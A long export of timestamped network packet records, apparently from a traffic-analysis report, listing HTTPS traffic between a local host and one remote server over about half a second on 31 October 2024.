                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676569939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676569939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676618099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676666975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676666975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676716089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676716089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676765919 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676765919 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676814079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676918030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676966906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677010059 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677010059 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677058935 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677156925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677206039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677254915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677254915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677352905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677352905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677402020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677402020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677450895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677450895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677548885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677548885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677675009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677675009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677772045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677820921 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677820921 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677918911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677918911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.677972078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.678020000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.678020954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.678117990 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.682774067 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.685787916 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.699407101 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.699419975 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.699656963 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.699656963 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.699670076 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.699762106 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.704372883 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.704387903 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.704621077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.704621077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.704633951 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.704643965 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.705101013 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.705111980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.705307007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.705307007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.705322981 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.705333948 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.705418110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.709490061 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.709502935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.709671021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.709682941 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.709708929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.709708929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.709758997 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.715349913 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.715361118 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.715576887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.715576887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.715590954 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.715605021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.715713024 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.721461058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.721474886 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.721685886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.721685886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.721698046 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.721733093 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.721781015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.724770069 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.724781990 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.724948883 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.724948883 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.724960089 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.724993944 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.724993944 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.725092888 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.728816032 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.728830099 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.729022026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.729094982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.729106903 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.729155064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.733213902 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.733228922 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.733438969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.733438969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.733452082 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.733643055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.736262083 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.736274004 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.736470938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.736470938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.736470938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.736485004 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.736494064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.736577034 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.760361910 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.760382891 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.760550976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.760550976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.760571003 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.760581970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.760581970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.760674953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764615059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764636040 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764802933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764802933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764822006 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764833927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764833927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764904976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.767142057 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.767163992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.767405033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.767422915 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.767433882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.808731079 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.808749914 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.808976889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.808976889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.808998108 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.809010029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821543932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821568012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821743011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821743011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821760893 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821774006 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821846962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821846962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850017071 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850037098 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850238085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850238085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850256920 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850267887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850394011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871498108 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871521950 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871718884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871718884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871738911 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871748924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871799946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874526024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874546051 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874726057 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874742985 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874789953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874806881 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.875843048 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.875863075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.876058102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.876058102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.876076937 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.876087904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.876138926 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.880728006 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.880748987 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.880935907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.880935907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.880954981 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.881042004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.881042004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.890666008 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.890690088 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.890909910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.890909910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.890928030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.891015053 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.892901897 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.892950058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893142939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893142939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893142939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893193007 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893217087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893217087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895117044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895174026 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895355940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895355940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895402908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895422935 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895508051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899384022 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899429083 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899609089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899609089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899609089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899658918 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899769068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.903778076 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.903831005 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.904067993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.904067993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.904119968 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907277107 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907320976 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907490015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907490015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907537937 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907560110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907560110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907560110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.930809021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.930862904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.931030989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.931030989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.931082010 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.931102037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.931102037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.931102037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.935133934 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.935178041 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.935353994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.935353994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.935401917 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.935424089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.935424089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.935424089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.937619925 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.937673092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.937846899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.937848091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.937896013 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.937916040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.937916040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.979197979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.979242086 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.979466915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.979466915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.979518890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.979552031 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.992656946 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.992714882 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.992866993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.992866993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.992918968 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.992938042 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.992938042 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.992938995 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.020517111 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.020560026 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.020741940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.020741940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.020742893 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.020742893 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.020797014 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.020931959 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.042648077 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.042701960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.043013096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.043013096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.043065071 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.045066118 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.045109987 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.045301914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.045347929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.045377970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.045377970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.045378923 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.046457052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.046508074 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.046681881 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.046683073 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.046730995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.046751976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.050354004 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.050398111 CET4434975554.37.62.77192.168.11.20
